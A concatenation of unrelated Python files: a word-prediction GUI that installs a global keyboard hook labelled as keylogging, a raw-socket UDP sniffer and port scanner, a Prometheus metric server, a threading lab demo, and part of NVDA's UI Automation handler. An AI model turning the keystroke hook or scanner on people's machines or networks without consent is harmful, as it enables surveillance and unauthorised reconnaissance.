def source_info_element_content_frame_configure( canvas, window, scrollbar ):
canvas.configure( scrollregion = canvas.bbox("all") )
canvas.itemconfig( window, width = canvas.winfo_width() - scrollbar.winfo_width() - 10 )
update_sources_masterobject_window = None
update_sources_masterobject_window_label = None
update_source_masterobject_worker_thread_return_value = True
def update_source_masterobject_worker_thread():
global source_master_object, update_source_masterobject_worker_thread_return_value
source_master_object.clear()
activated_sources_json_data = []
for source in sources_list[ "sources_list" ]:
if source[ "source_selected" ] == 1:
# Add this source's JSON contents to activated_sources_json_data
openedFile = {}
fileText = ""
if os.path.isfile(os.path.dirname(os.path.realpath(__file__)) + "/sources/" + source[ "source_name" ] + ".json"):
openedFile = open("sources/" + source[ "source_name" ] + ".json", "r")
fileText = openedFile.read()
openedFile.close()
# Now try to JSON decode our read file text
try:
activated_sources_json_data.append(json.loads(fileText))
except ValueError:
tkinter.messagebox.showerror("JSON Decode Error", "Couldn't decode JSON from source file \"sources/" + source[ "source_name" ] + ".json\". Unable to properly build master object.")
update_source_masterobject_worker_thread_return_value = False
# JSON loaded successfully
else:
tkinter.messagebox.showerror("File Load Error", "Couldn't load source file \"sources/" + source[ "source_name" ] + ".json\". Unable to properly build master object.")
update_source_masterobject_worker_thread_return_value = False
# All source data to be used is now loaded into the list activated_sources_json_data
# Now assemble each separate source file into one masterobject
for activated_source in activated_sources_json_data:
for word in activated_source[ "top_word_list" ]:
if word in source_master_object:
# Word already exists in source_master_object
# Add this word's total_frequency to master object
source_master_object[ word ][ "total_frequency" ] += activated_source[ "top_word_list" ][ word ][ "total_frequency" ]
# Merge the subsequent_words from this with master object's
for subsequent_word_index in range( 0, len( activated_source[ "top_word_list" ][ word ][ "subsequent_words" ] ) ):
subseq_exists_in_master = False
for mastersource_subsequent_word_index in range( 0, len( source_master_object[ word ][ "subsequent_words" ] ) ):
# Check if subsequent word already exists in master object
if activated_source[ "top_word_list" ][ word ][ "subsequent_words" ][ subsequent_word_index ][ "word_name" ] == \
source_master_object[ word ][ "subsequent_words" ][ mastersource_subsequent_word_index ][ "word_name" ]:
# Already exists in master object, so just frequency to master
source_master_object[ word ][ "subsequent_words" ][ mastersource_subsequent_word_index ][ "subseq_frequency" ] += \
activated_source[ "top_word_list" ][ word ][ "subsequent_words" ][ subsequent_word_index ][ "subseq_frequency" ]
subseq_exists_in_master = True
if subseq_exists_in_master == False:
# Is new subsequent word, so just copy contents of current one to master
source_master_object[ word ][ "subsequent_words" ].append( activated_source[ "top_word_list" ][ word ][ "subsequent_words" ][ subsequent_word_index ] )
else:
# New word not in master object
# Create new entry and copy over the contents from this source
source_master_object[ word ] = activated_source[ "top_word_list" ][ word ]
if update_sources_masterobject_window != None:
update_sources_masterobject_window.destroy()
update_source_masterobject_worker_thread_return_value = True
update_suggestions()
root.focus_force()
return
def update_source_masterobject():
global source_master_object, update_sources_masterobject_window, \
update_sources_masterobject_window_label, update_source_masterobject_worker_thread_return_value
update_source_masterobject_worker_thread_return_value = True
update_sources_masterobject_window = Toplevel()
update_sources_masterobject_window.title("Updating Compound Sourcefile Data")
update_sources_masterobject_window.resizable(width = FALSE, height = FALSE)
update_sources_masterobject_window.config(background = "black")
update_sources_masterobject_window.wm_attributes("-disabled", "1")
update_sources_masterobject_window.geometry("300x50+" + str(int((win32api.GetMonitorInfo(win32api.EnumDisplayMonitors()[0][0])["Work"][2] / 2) \
- (300 / 2))) + "+" + str(int((win32api.GetMonitorInfo(win32api.EnumDisplayMonitors()[0][0])["Work"][3] / 2) - (50 / 2))))
update_sources_masterobject_window_label = Label(update_sources_masterobject_window, text = "Updating combined sourcefile data...\nPlease wait...", justify = CENTER, background = "black", foreground = "white")
update_sources_masterobject_window_label.place(relx = 0.5, rely = 0.5, anchor = CENTER)
update_sources_masterobject_window.wm_transient(master = root)
update_sources_masterobject_window.protocol('WM_DELETE_WINDOW', None)
update_sources_masterobject_window.focus_set()
update_sources_masterobject_window.grab_set()
worker_thread = threading.Thread( target = update_source_masterobject_worker_thread )
worker_thread.daemon = True
worker_thread.start()
return update_source_masterobject_worker_thread_return_value
def sourceframe_background_clicked(event):
global source_element_selected_index, source_elements_label_widget_list, source_elements_checkbutton_widget_list
source_element_selected_index = None
for source_index2 in range( 0, len( sources_list["sources_list"] )):
source_elements_label_widget_list[ source_index2 ].config( background = "white", foreground = "black" )
source_elements_checkbutton_widget_list[ source_index2 ].config( background = "white", activebackground = "white", highlightbackground = "white" )
return
def update_sources():
# Two major things that are supposed to happen here:
# First, the sources info panel gets updated with source names
# Second, the convergent source object that predictions come from is remade with currently activated sources
# This function assumes that sources_list is updated and each name in that file will link to a source file
global sources_list, sources_info_display_frame, source_element_activated_variablelist, \
source_element_selected_index, source_elements_label_widget_list, source_elements_checkbutton_widget_list
source_element_selected_index = None
# Empty the variable lists
del source_element_activated_variablelist[:]
del source_elements_label_widget_list[:]
del source_elements_checkbutton_widget_list[:]
# Create the sources informational display frame for the sources view
if sources_info_display_frame != None:
if sources_info_display_frame.winfo_exists():
sources_info_display_frame.destroy()
sources_info_display_frame = Frame(master = sources_frame, background = "gray", borderwidth = 2, relief = FLAT)
sources_info_display_frame.grid(row = 0, column = 0, sticky = N+S+E+W)
sources_info_display_frame.grid_rowconfigure(0, weight = 1)
sources_info_display_frame.grid_rowconfigure(1, weight = 9)
sources_info_display_frame.grid_columnconfigure(0, weight = 4)
sources_info_display_frame.grid_columnconfigure(1, weight = 1)
# First, update the frame
source_info_name_label = Label(sources_info_display_frame, text = "Source Name", font = ("Helvetica", 10), background = "gray", padx = 4, pady = 4, foreground = "white")
source_info_name_label.grid(row = 0, column = 0, sticky = N+S+W)
source_info_activated_label = Label(sources_info_display_frame, text = "Activated?", font = ("Helvetica", 10), background = "gray", anchor = W, padx = 4, pady = 4, foreground = "white")
source_info_activated_label.grid(row = 0, column = 1, sticky = N+S+W)
# Frame for actual source elements
source_info_elements_frame = Frame(master = sources_info_display_frame, background = "white")
source_info_elements_frame.grid(row = 1, column = 0, columnspan = 2, padx = 4, pady = 2, sticky = N+S+E+W)
# Canvas element content frame container
source_info_elements_canvas = Canvas(master = source_info_elements_frame, height = 85, borderwidth = 0, background = "white")
source_info_elements_canvas.pack(side = LEFT, fill = BOTH, expand = TRUE)
# Scrollbar for actual source elements
source_info_elements_scrollbar = Scrollbar( master = source_info_elements_frame, orient = "vertical", command = source_info_elements_canvas.yview )
source_info_elements_scrollbar.pack(side = RIGHT, fill = Y)
source_info_elements_canvas.configure( yscrollcommand = source_info_elements_scrollbar.set )
# Frame for actual element info content
# Render with a white background if no elements currently exist so that a black dot doesn't appear in the container frame's top-left corner
if len( sources_list["sources_list"] ) > 0:
source_info_element_content_frame = Frame(master = source_info_elements_canvas, background = "black")
else:
source_info_element_content_frame = Frame(master = source_info_elements_canvas, background = "white")
source_info_element_content_frame.grid_columnconfigure(0, weight = 5)
source_info_element_content_frame.grid_columnconfigure(1, weight = 1)
source_info_elements_canvas_window = source_info_elements_canvas.create_window( (0, 0), window = source_info_element_content_frame, anchor = NW )
source_info_element_content_frame.bind( "<Configure>", lambda event, canvas = source_info_elements_canvas, \
window = source_info_elements_canvas_window, scrollbar = source_info_elements_scrollbar: source_info_element_content_frame_configure( canvas, window, scrollbar ) )
source_info_elements_canvas.bind( "<Button-1>", sourceframe_background_clicked )
for source_index in range( 0, len( sources_list["sources_list"] )):
# First, populate the info frame with each source
source_elements_label_widget_list.insert( source_index, Label(source_info_element_content_frame, text = sources_list["sources_list"][source_index]["source_name"], anchor = W, background = "white", foreground = "black"))
source_elements_label_widget_list[ source_index ].grid(row = source_index, column = 0, padx = 1, pady = 1, sticky = N+S+E+W)
source_elements_label_widget_list[ source_index ].bind( "<Button-1>", lambda event : source_element_label_widget_clicked( event ) )
source_element_activated_variablelist.insert( source_index, IntVar() )
source_elements_checkbutton_widget_list.insert( source_index, Checkbutton( source_info_element_content_frame, background = "white", \
foreground = "black", highlightbackground = "white", activebackground = "white", \
variable = source_element_activated_variablelist[source_index], anchor = CENTER, command = source_element_checkbutton_toggled ) )
if sources_list["sources_list"][source_index]["source_selected"] == 1:
source_elements_checkbutton_widget_list[ source_index ].select()
else:
source_elements_checkbutton_widget_list[ source_index ].deselect()
source_elements_checkbutton_widget_list[ source_index ].grid(row = source_index, column = 1, padx = 1, pady = 1, sticky = N+S+E+W)
update_source_masterobject()
return
# Keylogging components
hook_manager = pyHook.HookManager()
hook_manager.SubscribeKeyDown(on_keyboard_down_event)
hook_manager.SubscribeKeyUp(on_keyboard_up_event)
# Attach hook_manager to the physical keyboard
hook_manager.HookKeyboard()
update_sources()
root.mainloop()
|
getsniffer.py
|
import socket
import os
import threading
import binascii
from lib.udp_sender.udp_sender import udp_sender
outputfilename = ""
probemaster = []
pack = []
output_tuple = []
output = []
probehelplist = []
helpdata=[]
def getsniffer(host, args):
if args.noise != None:
noise = args.noise
if args.output:
outputfilename = args.output
if args.timeout != "True" and args.timeout != None:
timeout = args.timeout
if args.host:
hosts = args.host
target = hosts.split(",")
sock_add_family = socket.AF_INET
sock_ip_proto = socket.IPPROTO_IP
global port
outputfilestr = ""
sniffer = socket.socket(sock_add_family, socket.SOCK_RAW, socket.IPPROTO_UDP)
sniffer.bind((host, 0))
sniffer.setsockopt(sock_ip_proto, socket.IP_HDRINCL, 1)
sniffer.settimeout(int(float(timeout) * 60)) # Set timeout - 60 seconds
f = open(outputfilename, 'a+') # a+
f.write("Scanning following IPs: \n\n" + str(target) + "\n\n")
f.truncate()
f.close()
if os.name == "nt":
sniffer.ioctl(socket.SIO_RCVALL, socket.RCVALL_ON) # might be not necessary in this case
t = threading.Thread(target=udp_sender, args=(target, pack, args))
t.start()
printflag = "false"
try:
while True:
raw_buffer = sniffer.recvfrom(65565)
snif = binascii.hexlify(raw_buffer[0])
source_ip = raw_buffer[1][0]
destination_ip = ""
if "." in source_ip:
port = str(int(snif[40:44], 16)) # FOR IPv4
elif ":" in source_ip:
port = str(int(snif[0:4], 16)) # FOR IPv6
if snif != "" and printflag == "false":
print("%-40s %-10s %-5s %s" % ("IP", "PORT(UDP)", "STAT", "SERVICE"))
printflag = "true"
printservice = ""
for i in range(len(probemaster)):
if int(probemaster[i][0]) == int(port):
for ii in range(len(probemaster[i][1])):
if printservice != "":
printservice += "/"
printservice += probemaster[i][1][ii][0]
if printservice == "":
printservice = "Unknown Service"
noisyport = "true"
pack_port = []
for i in range(len(pack)):
pack_port.append(str(pack[i][0]))
if '%' in str(source_ip):
source_ip = str(source_ip)[0:str(source_ip).index('%')]
if (((port in pack_port) and (str(source_ip) in target) and (noise in ["False", "false"])) or (
noise in ["True", "true"])) and ((str(source_ip), port) not in output_tuple):
if str(source_ip) != "::1":
print("%-40s %-10s open %s" % (str(source_ip), port, printservice))
output.append([str(source_ip), port, printservice, snif])
output_tuple.append((str(source_ip), port))
if args.verbose not in ["false", "False"]:
outputfilestr = "Host: " + str(source_ip) + "; PORT: " + str(
port) + ";" + ' STATE: open' + "; UDP Service:" + str(printservice) + "; " + str(snif) + " \n\n"
else:
outputfilestr = "Host: " + str(source_ip) + "; PORT: " + str(
port) + ";" + ' STATE: open' + "; UDP Service:" + str(printservice) + " \n\n"
if args.output:
f = open(outputfilename, 'a+')
f.write(outputfilestr)
f.truncate()
f.close()
except socket.timeout:
if float(timeout) >= 1.0:
print("\nINFO: Sniffer timeout was set to " + str(timeout) + " minutes")
else:
print("\nINFO: Sniffer timeout was set to " + str(float(timeout) * 60) + " seconds")
except Exception as e:
print("\nError occured: 20001, More information: :" + str(e))
# handle CTRL-C
except KeyboardInterrupt:
# Windows turn off promiscuous mode
if os.name == "nt":
sniffer.ioctl(socket.SIO_RCVALL, socket.RCVALL_OFF)
finally:
for phdata in probehelplist:
for odata in output:
if odata[1] == phdata[0]:
helpdata.append(str(odata[2]) + "(port " + str(odata[1]) + "):" + str(phdata[1]))
|
server.py
|
from __future__ import absolute_import
from prometheus_client import start_http_server, Gauge, Counter, Histogram, Summary
import redis
import json
import logging
import sys
if sys.version_info < (3, 0):
from subprocess32 import call
else:
from subprocess import call
import psutil
from .schema import validate_schema, Prom_Type
from jsonschema import ValidationError
from .config import CHANNEL_NAME, DEFAULT_BUCKETS, UNIX_SOCKET_PATH
class Metric:
"""
Metric class abstract away the complexity of dealing with Prometheus
data types.
"""
def __init__(self, name, metric_type, description, buckets):
self.name = name
self.type = metric_type
if metric_type == 'Counter':
self._metric = Counter(name, description)
elif metric_type == 'Gauge':
self._metric = Gauge(name, description)
elif metric_type == 'Histogram':
self._metric = Histogram(name, description, buckets=buckets)
elif metric_type == 'Summary':
self._metric = Summary(name, description)
def report(self, value):
value = float(value)
if self.type == 'Counter':
self._metric.inc(value)
elif self.type == 'Gauge':
self._metric.set(value)
elif self.type == 'Histogram' or self.type == 'Summary':
self._metric.observe(value)
def add_metric(name, metric_type, description, buckets, metric_pool):
metric_pool[name] = Metric(name, metric_type, description, buckets)
def report_metric(name, val, metric_pool):
if name in metric_pool:
metric_pool[name].report(val)
else:
logger = logging.getLogger(__name__)
logger.error("{} not found in metric pool: {}".format(
name, metric_pool.keys()))
def handle_message(message_dict, metric_pool):
"""
Handle a message dictionary, dispatch request to add or report call
"""
endpoint = message_dict['endpoint']
data = message_dict['data']
if endpoint == 'add':
add_metric(data['name'], data['type'], data['description'],
data.get('buckets', DEFAULT_BUCKETS), metric_pool)
elif endpoint == 'report':
report_metric(data['name'], data['data'], metric_pool)
def start_server():
logger = _init_logger()
start_http_server(1390)
logger.info("Metric Server Started!")
r = redis.Redis(unix_socket_path=UNIX_SOCKET_PATH)
sub = r.pubsub(ignore_subscribe_messages=True)
sub.subscribe(CHANNEL_NAME)
logger.info("Redis Connected! Waiting for messages...")
metric_pool = {}
for message in sub.listen(): # Blocking, will run forever
logger.debug(message)
try:
if sys.version_info < (3, 0):
message_dict = json.loads(message['data'])
else:
message_dict = json.loads(message['data'].decode('utf-8'))
validate_schema(message_dict)
handle_message(message_dict, metric_pool)
except (KeyError, ValueError, ValidationError) as e:
# Here, we catch errors in
# (1) message['data'], the redis queue is not sending correct
# message in expected format.
# (2) json.loads, the json string is corrupted.
# (3) validate_schema will throw ValidationError if schema
# validation failed.
#
# Note:
# (2) leads to json ValueError in python2,
# JSONEncoderError in python3
logger.error(e)
def _init_logger():
logging.basicConfig(
filename='/metric_server.log',
format=
'%(asctime)s %(levelname)-8s [%(filename)s:%(lineno)d] %(message)s',
datefmt='%y-%m-%d:%H:%M:%S',
level=logging.DEBUG)
logger = logging.getLogger(__name__)
return logger
def start_redis_daemon():
cmd = [
'redis-server', '--unixsocket', '/tmp/redis.sock', '--daemonize', 'yes'
]
call(cmd)
def redis_daemon_exist():
# We can just check of 'redis-server' process because the default
# situation is that we are in a container without any other python2
# process.
pids = psutil.pids()
process_names = []
for pid in pids:
try:
name = psutil.Process(pid).name()
except psutil.NoSuchProcess:
name = None
process_names.append(name)
return 'redis-server' in process_names
if __name__ == '__main__':
start_redis_daemon()
# This snippet of code spin up a debug server
# that sends the log to 1392. Don't forget to add
# the debug line to container manager as well!
if len(sys.argv) > 1 and sys.argv[-1] == 'DEBUG':
def start_debug_server():
from flask import Flask, send_file, jsonify
app = Flask(__name__)
@app.route('/')
def show_log():
return send_file('/metric_server.log')
app.run(host='0.0.0.0', port=1392)
from multiprocessing import Process
debug_proc = Process(target=start_debug_server)
debug_proc.start()
start_server()
|
lab3.py
|
import time, os
from threading import Thread, current_thread
from multiprocessing import Process, current_process, Pool
import sys
COUNT = 200000000
SLEEP = 10
def io_bound(sec):
pid = os.getpid()
threadName = current_thread().name
processName = current_process().name
#print(f"{pid} * {processName} * {threadName} ---> Start sleeping...")
print(pid," * ",processName," * ",threadName," ---> Start sleeping...")
time.sleep(sec)
print(pid," * ",processName," * ",threadName," ---> Finish sleeping...")
#print(f"{pid} * {processName} * {threadName} ---> Finished sleeping...")
def cpu_bound(n):
pid = os.getpid()
threadName = current_thread().name
processName = current_process().name
print(f"{pid} * {processName} * {threadName} ---> Start counting...")
while n>0:
n -= 1
print(f"{pid} * {processName} * {threadName} ---> Finished counting...")
if __name__=="__main__":
start = time.time()
if len(sys.argv)!=2:
print("USO: python lab3.py DEBUG")
sys.exit(1)
DEBUG=int(sys.argv[1])
if DEBUG==1:
io_bound(SLEEP)
io_bound(SLEEP)
elif DEBUG==2:
t1 = Thread(target = io_bound, args =(SLEEP, ))
t2 = Thread(target = io_bound, args =(SLEEP, ))
t1.start()
t2.start()
t1.join()
t2.join()
elif DEBUG==3:
cpu_bound(COUNT)
cpu_bound(COUNT)
elif DEBUG==4:
t1 = Thread(target = cpu_bound, args =(COUNT, ))
t2 = Thread(target = cpu_bound, args =(COUNT, ))
t1.start()
t2.start()
t1.join()
t2.join()
elif DEBUG==5:
p1 = Process(target = cpu_bound, args =(COUNT, ))
p2 = Process(target = cpu_bound, args =(COUNT, ))
p1.start()
p2.start()
p1.join()
p2.join()
elif DEBUG==6:
pool = Pool(processes=2)
pool.apply_async(cpu_bound, [COUNT])
pool.apply_async(cpu_bound, [COUNT])
pool.close()
pool.join()
elif DEBUG==7:
p1 = Process(target = io_bound, args =(SLEEP, ))
p2 = Process(target = io_bound, args =(SLEEP, ))
p1.start()
p2.start()
p1.join()
p2.join()
end = time.time()
print('Time taken in seconds -', end - start)
|
_UIAHandler.py
|
#_UIAHandler.py
#A part of NonVisual Desktop Access (NVDA)
#Copyright (C) 2011-2018 NV Access Limited, Joseph Lee, Babbage B.V.
#This file is covered by the GNU General Public License.
#See the file COPYING for more details.
from ctypes import *
from ctypes.wintypes import *
import comtypes.client
from comtypes.automation import VT_EMPTY
from comtypes import *
import weakref
import threading
import time
import config
import api
import appModuleHandler
import queueHandler
import controlTypes
import NVDAHelper
import winKernel
import winUser
import eventHandler
from logHandler import log
import UIAUtils
from comtypes.gen.UIAutomationClient import *
#Some newer UIA constants that could be missing
ItemIndex_Property_GUID=GUID("{92A053DA-2969-4021-BF27-514CFC2E4A69}")
ItemCount_Property_GUID=GUID("{ABBF5C45-5CCC-47b7-BB4E-87CB87BBD162}")
HorizontalTextAlignment_Left=0
HorizontalTextAlignment_Centered=1
HorizontalTextAlignment_Right=2
HorizontalTextAlignment_Justified=3
# The name of the WDAG (Windows Defender Application Guard) process
WDAG_PROCESS_NAME=u'hvsirdpclient'
goodUIAWindowClassNames=[
# A WDAG (Windows Defender Application Guard) Window is always native UIA, even if it doesn't report as such.
'RAIL_WINDOW',
]
badUIAWindowClassNames=[
"SysTreeView32",
"WuDuiListView",
"ComboBox",
"msctls_progress32",
"Edit",
"CommonPlacesWrapperWndClass",
"SysMonthCal32",
"SUPERGRID", #Outlook 2010 message list
"RichEdit",
"RichEdit20",
"RICHEDIT50W",
"SysListView32",
"EXCEL7",
"Button",
# #7497: Windows 10 Fall Creators Update has an incomplete UIA implementation for console windows, therefore for now we should ignore it.
# It does not implement caret/selection, and probably has no new text events.
"ConsoleWindowClass",
# #8944: The Foxit UIA implementation is incomplete and should not be used for now.
"FoxitDocWnd",
]
# #8405: used to detect UIA dialogs prior to Windows 10 RS5.
UIADialogClassNames=[
"#32770",
"NUIDialog",
"Credential Dialog Xaml Host", # UAC dialog in Anniversary Update and later
"Shell_Dialog",
"Shell_Flyout",
"Shell_SystemDialog", # Various dialogs in Windows 10 Settings app
]
NVDAUnitsToUIAUnits={
"character":TextUnit_Character,
"word":TextUnit_Word,
"line":TextUnit_Line,
"paragraph":TextUnit_Paragraph,
"readingChunk":TextUnit_Line,
}
UIAControlTypesToNVDARoles={
UIA_ButtonControlTypeId:controlTypes.ROLE_BUTTON,
UIA_CalendarControlTypeId:controlTypes.ROLE_CALENDAR,
UIA_CheckBoxControlTypeId:controlTypes.ROLE_CHECKBOX,
UIA_ComboBoxControlTypeId:controlTypes.ROLE_COMBOBOX,
UIA_EditControlTypeId:controlTypes.ROLE_EDITABLETEXT,
UIA_HyperlinkControlTypeId:controlTypes.ROLE_LINK,
UIA_ImageControlTypeId:controlTypes.ROLE_GRAPHIC,
UIA_ListItemControlTypeId:controlTypes.ROLE_LISTITEM,
UIA_ListControlTypeId:controlTypes.ROLE_LIST,
UIA_MenuControlTypeId:controlTypes.ROLE_POPUPMENU,
UIA_MenuBarControlTypeId:controlTypes.ROLE_MENUBAR,
UIA_MenuItemControlTypeId:controlTypes.ROLE_MENUITEM,
UIA_ProgressBarControlTypeId:controlTypes.ROLE_PROGRESSBAR,
UIA_RadioButtonControlTypeId:controlTypes.ROLE_RADIOBUTTON,
UIA_ScrollBarControlTypeId:controlTypes.ROLE_SCROLLBAR,
UIA_SliderControlTypeId:controlTypes.ROLE_SLIDER,
UIA_SpinnerControlTypeId:controlTypes.ROLE_SPINBUTTON,
UIA_StatusBarControlTypeId:controlTypes.ROLE_STATUSBAR,
UIA_TabControlTypeId:controlTypes.ROLE_TABCONTROL,
UIA_TabItemControlTypeId:controlTypes.ROLE_TAB,
UIA_TextControlTypeId:controlTypes.ROLE_STATICTEXT,
UIA_ToolBarControlTypeId:controlTypes.ROLE_TOOLBAR,
UIA_ToolTipControlTypeId:controlTypes.ROLE_TOOLTIP,
UIA_TreeControlTypeId:controlTypes.ROLE_TREEVIEW,
UIA_TreeItemControlTypeId:controlTypes.ROLE_TREEVIEWITEM,
UIA_CustomControlTypeId:controlTypes.ROLE_UNKNOWN,
UIA_GroupControlTypeId:controlTypes.ROLE_GROUPING,
UIA_ThumbControlTypeId:controlTypes.ROLE_THUMB,
UIA_DataGridControlTypeId:controlTypes.ROLE_DATAGRID,
UIA_DataItemControlTypeId:controlTypes.ROLE_DATAITEM,
UIA_DocumentControlTypeId:controlTypes.ROLE_DOCUMENT,
UIA_SplitButtonControlTypeId:controlTypes.ROLE_SPLITBUTTON,
UIA_WindowControlTypeId:controlTypes.ROLE_WINDOW,
UIA_PaneControlTypeId:controlTypes.ROLE_PANE,
UIA_HeaderControlTypeId:controlTypes.ROLE_HEADER,
UIA_HeaderItemControlTypeId:controlTypes.ROLE_HEADERITEM,
UIA_TableControlTypeId:controlTypes.ROLE_TABLE,
UIA_TitleBarControlTypeId:controlTypes.ROLE_TITLEBAR,
UIA_SeparatorControlTypeId:controlTypes.ROLE_SEPARATOR,
}
UIAPropertyIdsToNVDAEventNames={
UIA_NamePropertyId:"nameChange",
UIA_HelpTextPropertyId:"descriptionChange",
UIA_ExpandCollapseExpandCollapseStatePropertyId:"stateChange",
UIA_ToggleToggleStatePropertyId:"stateChange",
UIA_IsEnabledPropertyId:"stateChange",
UIA_ValueValuePropertyId:"valueChange",
UIA_RangeValueValuePropertyId:"valueChange",
UIA_ControllerForPropertyId:"UIA_controllerFor",
}
UIAEventIdsToNVDAEventNames={
UIA_LiveRegionChangedEventId:"liveRegionChange",
#UIA_Text_TextChangedEventId:"textChanged",
UIA_SelectionItem_ElementSelectedEventId:"UIA_elementSelected",
UIA_MenuOpenedEventId:"gainFocus",
UIA_SelectionItem_ElementAddedToSelectionEventId:"stateChange",
UIA_SelectionItem_ElementRemovedFromSelectionEventId:"stateChange",
#UIA_MenuModeEndEventId:"menuModeEnd",
#UIA_Text_TextSelectionChangedEventId:"caret",
UIA_ToolTipOpenedEventId:"UIA_toolTipOpened",
#UIA_AsyncContentLoadedEventId:"documentLoadComplete",
#UIA_ToolTipClosedEventId:"hide",
UIA_Window_WindowOpenedEventId:"UIA_window_windowOpen",
UIA_SystemAlertEventId:"UIA_systemAlert",
}
class UIAHandler(COMObject):
_com_interfaces_=[IUIAutomationEventHandler,IUIAutomationFocusChangedEventHandler,IUIAutomationPropertyChangedEventHandler,IUIAutomationNotificationEventHandler]
def __init__(self):
super(UIAHandler,self).__init__()
self.MTAThreadInitEvent=threading.Event()
self.MTAThreadStopEvent=threading.Event()
self.MTAThreadInitException=None
self.MTAThread=threading.Thread(target=self.MTAThreadFunc)
self.MTAThread.daemon=True
self.MTAThread.start()
self.MTAThreadInitEvent.wait(2)
if self.MTAThreadInitException:
raise self.MTAThreadInitException
def terminate(self):
MTAThreadHandle=HANDLE(windll.kernel32.OpenThread(winKernel.SYNCHRONIZE,False,self.MTAThread.ident))
self.MTAThreadStopEvent.set()
#Wait for the MTA thread to die (while still message pumping)
if windll.user32.MsgWaitForMultipleObjects(1,byref(MTAThreadHandle),False,200,0)!=0:
log.debugWarning("Timeout or error while waiting for UIAHandler MTA thread")
windll.kernel32.CloseHandle(MTAThreadHandle)
del self.MTAThread
def MTAThreadFunc(self):
try:
oledll.ole32.CoInitializeEx(None,comtypes.COINIT_MULTITHREADED)
isUIA8=False
try:
self.clientObject=CoCreateInstance(CUIAutomation8._reg_clsid_,interface=IUIAutomation,clsctx=CLSCTX_INPROC_SERVER)
isUIA8=True
except (COMError,WindowsError,NameError):
self.clientObject=CoCreateInstance(CUIAutomation._reg_clsid_,interface=IUIAutomation,clsctx=CLSCTX_INPROC_SERVER)
# #7345: Instruct UIA to never map MSAA winEvents to UIA propertyChange events.
# These events are not needed by NVDA, and they can cause the UI Automation client library to become unresponsive if an application firing winEvents has a slow message pump.
pfm=self.clientObject.proxyFactoryMapping
for index in xrange(pfm.count):
e=pfm.getEntry(index)
for propertyID in UIAPropertyIdsToNVDAEventNames.keys():
# Check if this proxy has mapped any winEvents to the UIA propertyChange event for this property ID
try:
oldWinEvents=e.getWinEventsForAutomationEvent(UIA_AutomationPropertyChangedEventId,propertyID)
except IndexError:
# comtypes does not seem to correctly handle a returned empty SAFEARRAY, raising IndexError
oldWinEvents=None
if oldWinEvents:
# As winEvents were mapped, replace them with an empty list
e.setWinEventsForAutomationEvent(UIA_AutomationPropertyChangedEventId,propertyID,[])
# Changes to an enty are not automatically picked up.
# Therefore remove the entry and re-insert it.
pfm.removeEntry(index)
pfm.insertEntry(index,e)
if isUIA8:
# #8009: use appropriate interface based on highest supported interface.
# #8338: made easier by traversing interfaces supported on Windows 8 and later in reverse.
for interface in reversed(CUIAutomation8._com_interfaces_):
try:
self.clientObject=self.clientObject.QueryInterface(interface)
break
except COMError:
pass
# Windows 10 RS5 provides new performance features for UI Automation including event coalescing and connection recovery.
# Enable all of these where available.
if isinstance(self.clientObject,IUIAutomation6):
self.clientObject.CoalesceEvents=CoalesceEventsOptions_Enabled
self.clientObject.ConnectionRecoveryBehavior=ConnectionRecoveryBehaviorOptions_Enabled
log.info("UIAutomation: %s"%self.clientObject.__class__.__mro__[1].__name__)
self.windowTreeWalker=self.clientObject.createTreeWalker(self.clientObject.CreateNotCondition(self.clientObject.CreatePropertyCondition(UIA_NativeWindowHandlePropertyId,0)))
self.windowCacheRequest=self.clientObject.CreateCacheRequest()
self.windowCacheRequest.AddProperty(UIA_NativeWindowHandlePropertyId)
self.UIAWindowHandleCache={}
self.baseTreeWalker=self.clientObject.RawViewWalker
self.baseCacheRequest=self.windowCacheRequest.Clone()
import UIAHandler
self.ItemIndex_PropertyId=NVDAHelper.localLib.registerUIAProperty(byref(ItemIndex_Property_GUID),u"ItemIndex",1)
self.ItemCount_PropertyId=NVDAHelper.localLib.registerUIAProperty(byref(ItemCount_Property_GUID),u"ItemCount",1)
for propertyId in (UIA_FrameworkIdPropertyId,UIA_AutomationIdPropertyId,UIA_ClassNamePropertyId,UIA_ControlTypePropertyId,UIA_ProviderDescriptionPropertyId,UIA_ProcessIdPropertyId,UIA_IsTextPatternAvailablePropertyId,UIA_IsContentElementPropertyId,UIA_IsControlElementPropertyId):
self.baseCacheRequest.addProperty(propertyId)
self.baseCacheRequest.addPattern(UIA_TextPatternId)
self.rootElement=self.clientObject.getRootElementBuildCache(self.baseCacheRequest)
self.reservedNotSupportedValue=self.clientObject.ReservedNotSupportedValue
self.ReservedMixedAttributeValue=self.clientObject.ReservedMixedAttributeValue
self.clientObject.AddFocusChangedEventHandler(self.baseCacheRequest,self)
self.clientObject.AddPropertyChangedEventHandler(self.rootElement,TreeScope_Subtree,self.baseCacheRequest,self,UIAPropertyIdsToNVDAEventNames.keys())
for x in UIAEventIdsToNVDAEventNames.iterkeys():
self.clientObject.addAutomationEventHandler(x,self.rootElement,TreeScope_Subtree,self.baseCacheRequest,self)
# #7984: add support for notification event (IUIAutomation5, part of Windows 10 build 16299 and later).
if isinstance(self.clientObject, IUIAutomation5):
self.clientObject.AddNotificationEventHandler(self.rootElement,TreeScope_Subtree,self.baseCacheRequest,self)
except Exception as e:
self.MTAThreadInitException=e
finally:
self.MTAThreadInitEvent.set()
self.MTAThreadStopEvent.wait()
self.clientObject.RemoveAllEventHandlers()
def IUIAutomationEventHandler_HandleAutomationEvent(self,sender,eventID):
if not self.MTAThreadInitEvent.isSet():
# UIAHandler hasn't finished initialising yet, so just ignore this event.
return
if eventID==UIA_MenuOpenedEventId and eventHandler.isPendingEvents("gainFocus"):
# We don't need the menuOpened event if focus has been fired,
# as focus should be more correct.
return
NVDAEventName=UIAEventIdsToNVDAEventNames.get(eventID,None)
if not NVDAEventName:
return
if not self.isNativeUIAElement(sender):
return
window=self.getNearestWindowHandle(sender)
if window and not eventHandler.shouldAcceptEvent(NVDAEventName,windowHandle=window):
return
import NVDAObjects.UIA
obj=NVDAObjects.UIA.UIA(UIAElement=sender)
if (
not obj
or (NVDAEventName=="gainFocus" and not obj.shouldAllowUIAFocusEvent)
or (NVDAEventName=="liveRegionChange" and not obj._shouldAllowUIALiveRegionChangeEvent)
):
return
focus=api.getFocusObject()
if obj==focus:
obj=focus
eventHandler.queueEvent(NVDAEventName,obj)
def IUIAutomationFocusChangedEventHandler_HandleFocusChangedEvent(self,sender):
if not self.MTAThreadInitEvent.isSet():
# UIAHandler hasn't finished initialising yet, so just ignore this event.
return
if not self.isNativeUIAElement(sender):
return
import NVDAObjects.UIA
if isinstance(eventHandler.lastQueuedFocusObject,NVDAObjects.UIA.UIA):
